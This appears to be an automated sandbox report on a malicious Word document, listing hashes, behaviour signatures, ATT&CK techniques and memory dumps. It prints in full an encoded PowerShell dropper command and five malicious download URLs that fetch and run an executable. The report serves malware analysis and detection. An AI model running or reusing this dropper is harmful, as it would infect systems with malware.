Analysis

  • max time kernel
    144s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    09-03-2021 17:38

General

  • Target

    Device/HarddiskVolume2/Users/user/Downloads/Attachments 19 G06979262.doc

  • Size

    87KB

  • MD5

    68fdeafc7361bbc3321f3828e902cda6

  • SHA1

    7abacfccb89a75f3faef70b8fc3963eb7bd647c8

  • SHA256

    1ab055b3121ec3823a0a3002eb1fe8f48d5c7f04d9f0e92496165fb2cc1ec9c2

  • SHA512

    340a5ecf9c17cb3798c8e473c9e20297e4dbdf5e85d1acc87daae4f54a34eb76adc288bf76e5efb70ad6f6343033446654a7dd5a6fbe32b62c365410c6f0f4fc

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://urbandogscol.com/wp-content/xiqjp4/

exe.dropper

http://spidersheet.com/wp-includes/js/swfupload/k0924/

exe.dropper

http://artoftribalindia.com/wp-content/uploads/r74d6u4/

exe.dropper

https://navinfamilywines.com/alloldfiles.zip/zegkb671/

exe.dropper

https://gabisan-shipping.com/n4mf/syz49i21/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Device\HarddiskVolume2\Users\user\Downloads\Attachments 19 G06979262.doc" /o ""
    1⤵
    • Drops file in Program Files directory
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4704
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:480
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -nop -e JABhAGYARAA4AHoATgA9ACcAVABNAHIANgB3AEUAQQAnADsAJABVAE0AdABfAHoANAB2AFkAIAA9ACAAJwA3ADYANAAnADsAJAByAHEAMwBKAGwAaQBjAD0AJwBXAFIAMwBCADkAWQAnADsAJABDADIAdABCAHcAVwBvAFUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFUATQB0AF8AegA0AHYAWQArACcALgBlAHgAZQAnADsAJABjAHcAegBOAGoAaQBGAD0AJwBIAGkAWQBvAF8ARAAnADsAJABHADAAQwBxAEsAOABEAD0ALgAoACcAbgBlAHcALQBvAGIAagAnACsAJwBlACcAKwAnAGMAdAAnACkAIABuAGAAZQBUAC4AdwBlAGIAYwBgAEwAYABJAGAARQBuAFQAOwAkAGgAbQBDAGYAaQBFAFkAPQAnAGgAdAB0AHAAOgAvAC8AdQByAGIAYQBuAGQAbwBnAHMAYwBvAGwALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB4AGkAcQBqAHAANAAvAEAAaAB0AHQAcAA6AC8ALwBzAHAAaQBkAGUAcgBzAGgAZQBlAHQALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGoAcwAvAHMAdwBmAHUAcABsAG8AYQBkAC8AawAwADkAMgA0AC8AQABoAHQAdABwADoALwAvAGEAcgB0AG8AZgB0AHIAaQBiAGEAbABpAG4AZABpAGEALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AcgA3ADQAZAA2AHUANAAvAEAAaAB0AHQAcABzADoALwAvAG4AYQB2AGkAbgBmAGEAbQBpAGwAeQB3AGkAbgBlAHMALgBjAG8AbQAvAGEAbABsAG8AbABkAGYAaQBsAGUAcwAuAHoAaQBwAC8AegBlAGcAawBiADYANwAxAC8AQABoAHQAdABwAHMAOgAvAC8AZwBhAGIAaQBzAGEAbgAtAHMAaABpAHAAcABpAG4AZwAuAGMAbwBtAC8AbgA0AG0AZgAvAHMAeQB6ADQAOQBpADIAMQAvACcALgBzAHAAbABJAFQAKAAnAEAAJwApADsAJABjAHMAYwBWADYAZgA9ACcAdwBYAFMAZgBMAHUAaAAnADsAZgBvAHIAZQBhAGMAaAAoACQAegBiAEYAdgB6AFYAdgAgAGkAbgAgACQAaABtAEMAZgBpAEUAWQApAHsAdAByAHkAewAkAEcAMABDAHEASwA4AEQALgBEAE8AVwBOAEwATwBhAEQARgBJAEwAZQAoACQAegBiAEYAdgB6AFYAdgAsACAAJABDADIAdABCAHcAVwBvAFUAKQA7ACQAWAAwADgAWgBSAEkAegBNAD0AJwB6AEIAbABiAE4AcwA1ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQwAyAHQAQgB3AFcAbwBVACkALgBMAEUATgBnAHQASAAgAC0AZwBlACAAMgA3ADkANgA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBzAFQAQQByAHQAKAAkAEMAMgB0AEIAdwBXAG8AVQApADsAJABCAG8AUwBTADEAawBLAD0AJwBGAFoAOABvADcAaQBGACcAOwBiAHIAZQBhAGsAOwAkAE8AagBxAEoAbQBGAGYAVwA9ACcARAB3AFIAVgAyAEoAcgB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGQAcgA5AF8AdgBNAEEAPQAnAGoANQBJAGkASwBIAEgAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3848

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/480-7-0x0000000000000000-mapping.dmp
    • memory/480-8-0x0000000002C70000-0x0000000002D71000-memory.dmp
      Filesize

      1.0MB

    • memory/3848-12-0x00000142A6260000-0x00000142A6261000-memory.dmp
      Filesize

      4KB

    • memory/3848-10-0x00007FF847F50000-0x00007FF84893C000-memory.dmp
      Filesize

      9.9MB

    • memory/3848-15-0x000001428D996000-0x000001428D998000-memory.dmp
      Filesize

      8KB

    • memory/3848-14-0x000001428D993000-0x000001428D995000-memory.dmp
      Filesize

      8KB

    • memory/3848-13-0x000001428D990000-0x000001428D992000-memory.dmp
      Filesize

      8KB

    • memory/3848-11-0x00000142A60B0000-0x00000142A60B1000-memory.dmp
      Filesize

      4KB

    • memory/4704-9-0x0000027D1A6B0000-0x0000027D1A6B4000-memory.dmp
      Filesize

      16KB

    • memory/4704-17-0x00007FF850470000-0x00007FF852F93000-memory.dmp
      Filesize

      43.1MB

    • memory/4704-2-0x00007FF82F820000-0x00007FF82F830000-memory.dmp
      Filesize

      64KB

    • memory/4704-3-0x00007FF82F820000-0x00007FF82F830000-memory.dmp
      Filesize

      64KB

    • memory/4704-4-0x00007FF82F820000-0x00007FF82F830000-memory.dmp
      Filesize

      64KB

    • memory/4704-6-0x00007FF82F820000-0x00007FF82F830000-memory.dmp
      Filesize

      64KB

    • memory/4704-16-0x00007FF850470000-0x00007FF852F93000-memory.dmp
      Filesize

      43.1MB

    • memory/4704-5-0x00007FF853020000-0x00007FF853657000-memory.dmp
      Filesize

      6.2MB

    • memory/4704-18-0x00007FF850470000-0x00007FF852F93000-memory.dmp
      Filesize

      43.1MB

    • memory/4704-19-0x00007FF850470000-0x00007FF852F93000-memory.dmp
      Filesize

      43.1MB

    • memory/4704-20-0x00007FF82F820000-0x00007FF82F830000-memory.dmp
      Filesize

      64KB

    • memory/4704-21-0x00007FF82F820000-0x00007FF82F830000-memory.dmp
      Filesize

      64KB

    • memory/4704-22-0x00007FF82F820000-0x00007FF82F830000-memory.dmp
      Filesize

      64KB

    • memory/4704-23-0x00007FF82F820000-0x00007FF82F830000-memory.dmp
      Filesize

      64KB